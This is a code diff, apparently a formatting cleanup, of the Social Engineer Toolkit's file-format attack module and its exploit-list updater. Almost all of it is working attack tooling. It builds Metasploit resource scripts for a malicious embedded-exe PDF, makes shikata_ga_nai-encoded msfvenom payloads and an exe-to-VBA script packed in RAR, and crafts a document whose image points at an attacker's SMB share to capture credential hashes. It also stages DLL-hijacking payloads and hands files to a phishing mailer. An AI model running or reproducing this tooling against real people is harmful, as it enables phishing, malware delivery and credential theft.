msfpath = (users_home + "/.msf5/")
|
msfpath = (users_home + "/.msf5/")
|
||||||
|
|
||||||
outpath=(msfpath + "local/" + outfile)
|
outpath = (msfpath + "local/" + outfile)
|
||||||
print_info("Generating fileformat exploit...")
|
print_info("Generating fileformat exploit...")
|
||||||
# START THE EXE TO VBA PAYLOAD
|
# START THE EXE TO VBA PAYLOAD
|
||||||
if exploit != 'custom/exe/to/vba/payload':
|
if exploit != 'custom/exe/to/vba/payload':
|
||||||
output = setdir + "/%s" % (outfile)
|
output = setdir + "/%s" % (outfile)
|
||||||
if os.path.isfile(setdir + "/template.pdf"):
|
if os.path.isfile(setdir + "/template.pdf"):
|
||||||
os.remove(setdir + "/template.pdf")
|
os.remove(setdir + "/template.pdf")
|
||||||
if os.path.isfile(msfpath + "local/template.pdf"):
|
if os.path.isfile(msfpath + "local/template.pdf"):
|
||||||
os.remove(msfpath + "local/template.pdf")
|
os.remove(msfpath + "local/template.pdf")
|
||||||
|
|
||||||
filewrite = file(setdir + "/template.rc", "w")
|
filewrite = file(setdir + "/template.rc", "w")
|
||||||
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" % (rhost,lport,inputpdf,output))
|
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" %
|
||||||
filewrite.close()
|
(rhost, lport, inputpdf, output))
|
||||||
child = pexpect.spawn("%smsfconsole -r %s/template.rc" % (meta_path, setdir))
|
filewrite.close()
|
||||||
a = 1
|
child = pexpect.spawn(
|
||||||
while a == 1:
|
"%smsfconsole -r %s/template.rc" % (meta_path, setdir))
|
||||||
if os.path.isfile(setdir + "/template.pdf"):
|
a = 1
|
||||||
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
|
while a == 1:
|
||||||
a = 2 #break
|
if os.path.isfile(setdir + "/template.pdf"):
|
||||||
else:
|
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir),
|
||||||
print_status("Waiting for payload generation to complete...")
|
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
|
||||||
if os.path.isfile(msfpath + "local/" + outfile):
|
a = 2 # break
|
||||||
subprocess.Popen("cp %slocal/%s %s" % (msfpath, outfile,setdir), shell=True)
|
else:
|
||||||
time.sleep(3)
|
print_status("Waiting for payload generation to complete...")
|
||||||
|
if os.path.isfile(msfpath + "local/" + outfile):
|
||||||
|
subprocess.Popen("cp %slocal/%s %s" %
|
||||||
|
(msfpath, outfile, setdir), shell=True)
|
||||||
|
time.sleep(3)
|
||||||
|
|
||||||
print_status("Payload creation complete.")
|
print_status("Payload creation complete.")
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
|
@ -200,99 +210,120 @@ if exploit_counter == 0:
|
||||||
# Creating Payload here
|
# Creating Payload here
|
||||||
# if not 64 specify raw output and filename of vb1.exe
|
# if not 64 specify raw output and filename of vb1.exe
|
||||||
if noencode == 0:
|
if noencode == 0:
|
||||||
execute1=("raw")
|
execute1 = ("raw")
|
||||||
payloadname=("vb1.exe")
|
payloadname = ("vb1.exe")
|
||||||
if noencode == 1:
|
if noencode == 1:
|
||||||
execute1=("exe")
|
execute1 = ("exe")
|
||||||
payloadname=("vb.exe")
|
payloadname = ("vb.exe")
|
||||||
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True)
|
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
|
||||||
|
(meta_path, payload, rhost, lport, execute1, setdir, payloadname), shell=True)
|
||||||
if noencode == 0:
|
if noencode == 0:
|
||||||
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True)
|
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
|
||||||
|
(meta_path, setdir, setdir), shell=True)
|
||||||
# Create the VB script here
|
# Create the VB script here
|
||||||
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % (meta_path,setdir,setdir), shell=True)
|
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
|
||||||
|
(meta_path, setdir, setdir), shell=True)
|
||||||
print_info("Raring the VBS file.")
|
print_info("Raring the VBS file.")
|
||||||
subprocess.Popen("rar a %s/template.rar %s/template.vbs" % (setdir,setdir), shell=True)
|
subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
|
||||||
|
(setdir, setdir), shell=True)
|
||||||
|
|
||||||
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
|
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
|
||||||
filewrite=file(setdir + "/payload.options","w")
|
filewrite = file(setdir + "/payload.options", "w")
|
||||||
filewrite.write(payload+" "+rhost+" "+lport)
|
filewrite.write(payload + " " + rhost + " " + lport)
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
if exploit != "dll_hijacking":
|
if exploit != "dll_hijacking":
|
||||||
if not os.path.isfile(setdir + "/fileformat.file"):
|
if not os.path.isfile(setdir + "/fileformat.file"):
|
||||||
sys.path.append("src/phishing/smtp/client/")
|
sys.path.append("src/phishing/smtp/client/")
|
||||||
debug_msg(me,"importing 'src.phishing.smtp.client.smtp_client'",1)
|
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
||||||
try: reload(smtp_client)
|
try:
|
||||||
except: import smtp_client
|
reload(smtp_client)
|
||||||
|
except:
|
||||||
|
import smtp_client
|
||||||
|
|
||||||
# start the unc_embed attack stuff here
|
# start the unc_embed attack stuff here
|
||||||
if exploit == "unc_embed":
|
if exploit == "unc_embed":
|
||||||
rhost=grab_ipaddress
|
rhost = grab_ipaddress
|
||||||
import string,random
|
import string
|
||||||
def random_string(minlength=6,maxlength=15):
|
import random
|
||||||
length=random.randint(minlength,maxlength)
|
|
||||||
letters=string.ascii_letters+string.digits
|
def random_string(minlength=6, maxlength=15):
|
||||||
|
length = random.randint(minlength, maxlength)
|
||||||
|
letters = string.ascii_letters + string.digits
|
||||||
return ''.join([random.choice(letters) for _ in range(length)])
|
return ''.join([random.choice(letters) for _ in range(length)])
|
||||||
rand_gen=random_string()
|
rand_gen = random_string()
|
||||||
filewrite=file(setdir + "/unc_config", "w")
|
filewrite = file(setdir + "/unc_config", "w")
|
||||||
filewrite.write("use server/capture/smb\n")
|
filewrite.write("use server/capture/smb\n")
|
||||||
filewrite.write("exploit -j\r\n\r\n")
|
filewrite.write("exploit -j\r\n\r\n")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
filewrite=file(setdir + "/template.doc", "w")
|
filewrite = file(setdir + "/template.doc", "w")
|
||||||
filewrite.write(r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' %(rhost,rand_gen))
|
filewrite.write(
|
||||||
|
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
sys.path.append("src/phishing/smtp/client/")
|
sys.path.append("src/phishing/smtp/client/")
|
||||||
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'",1)
|
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
||||||
try: reload(smtp_client)
|
try:
|
||||||
except: import smtp_client
|
reload(smtp_client)
|
||||||
|
except:
|
||||||
|
import smtp_client
|
||||||
|
|
||||||
# start the dll_hijacking stuff here
|
# start the dll_hijacking stuff here
|
||||||
if exploit == "dll_hijacking":
|
if exploit == "dll_hijacking":
|
||||||
sys.path.append("src/core/payloadgen")
|
sys.path.append("src/core/payloadgen")
|
||||||
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'",1)
|
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
|
||||||
try: reload(create_payloads)
|
try:
|
||||||
except: import create_payloads
|
reload(create_payloads)
|
||||||
|
except:
|
||||||
|
import create_payloads
|
||||||
|
|
||||||
sys.path.append("src/webattack/dll_hijacking")
|
sys.path.append("src/webattack/dll_hijacking")
|
||||||
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'",1)
|
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1)
|
||||||
try: reload(hijacking)
|
try:
|
||||||
except: import hijacking
|
reload(hijacking)
|
||||||
|
except:
|
||||||
|
import hijacking
|
||||||
|
|
||||||
# if we are not using apache
|
# if we are not using apache
|
||||||
if apache == 0:
|
if apache == 0:
|
||||||
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||||
# try:
|
# try:
|
||||||
filewrite=file(setdir + "/attack_vector","w")
|
filewrite = file(setdir + "/attack_vector", "w")
|
||||||
filewrite.write("hijacking")
|
filewrite.write("hijacking")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
filewrite=file(setdir + "/site.template","w")
|
filewrite = file(setdir + "/site.template", "w")
|
||||||
filewrite.write("TEMPLATE=CUSTOM")
|
filewrite.write("TEMPLATE=CUSTOM")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
|
||||||
child=pexpect.spawn("python src/html/web_server.py")
|
setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||||
|
child = pexpect.spawn("python src/html/web_server.py")
|
||||||
# except: child.close()
|
# except: child.close()
|
||||||
# if we are using apache
|
# if we are using apache
|
||||||
if apache == 1:
|
if apache == 1:
|
||||||
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
|
subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
|
||||||
|
(apache_path), shell=True).wait()
|
||||||
|
|
||||||
if os.path.isfile(setdir + "/meta_config"):
|
if os.path.isfile(setdir + "/meta_config"):
|
||||||
# if we aren't using the infectious method then do normal routine
|
# if we aren't using the infectious method then do normal routine
|
||||||
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||||
print_info("This may take a few to load MSF...")
|
print_info("This may take a few to load MSF...")
|
||||||
try:
|
try:
|
||||||
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir))
|
child1 = pexpect.spawn(
|
||||||
|
"%smsfconsole -L -r %s/meta_config" % (meta_path, setdir))
|
||||||
except:
|
except:
|
||||||
try:
|
try:
|
||||||
child1.close()
|
child1.close()
|
||||||
except: pass
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
# get the emails out
|
# get the emails out
|
||||||
# if we aren't using the infectious method then do the normal routine
|
# if we aren't using the infectious method then do the normal routine
|
||||||
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
if not os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||||
sys.path.append("src/phishing/smtp/client/")
|
sys.path.append("src/phishing/smtp/client/")
|
||||||
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'",1)
|
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
|
||||||
try: reload(smtp_client)
|
try:
|
||||||
except: import smtp_client
|
reload(smtp_client)
|
||||||
|
except:
|
||||||
|
import smtp_client
|
||||||
try:
|
try:
|
||||||
child1.interact()
|
child1.interact()
|
||||||
except:
|
except:
|
||||||
|
@ -300,4 +331,5 @@ if exploit == "dll_hijacking":
|
||||||
try:
|
try:
|
||||||
child.close()
|
child.close()
|
||||||
child1.close()
|
child1.close()
|
||||||
except: pass
|
except:
|
||||||
|
pass
|
||||||
|
|
|
@ -7,9 +7,12 @@ import sys
|
||||||
me = mod_name()
|
me = mod_name()
|
||||||
|
|
||||||
sys.path.append("src/core")
|
sys.path.append("src/core")
|
||||||
debug_msg(me,"re-importing 'src.core.setcore'",1)
|
debug_msg(me, "re-importing 'src.core.setcore'", 1)
|
||||||
try: reload(setcore)
|
try:
|
||||||
except: import setcore
|
reload(setcore)
|
||||||
print "[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]"
|
except:
|
||||||
generate_list=subprocess.Popen("%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
|
import setcore
|
||||||
print "[---] Database is now up-to-date [---]"
|
print("[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]")
|
||||||
|
generate_list = subprocess.Popen(
|
||||||
|
"%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
|
||||||
|
print("[---] Database is now up-to-date [---]")
|
||||||
|
|
Loading…
Reference in a new issue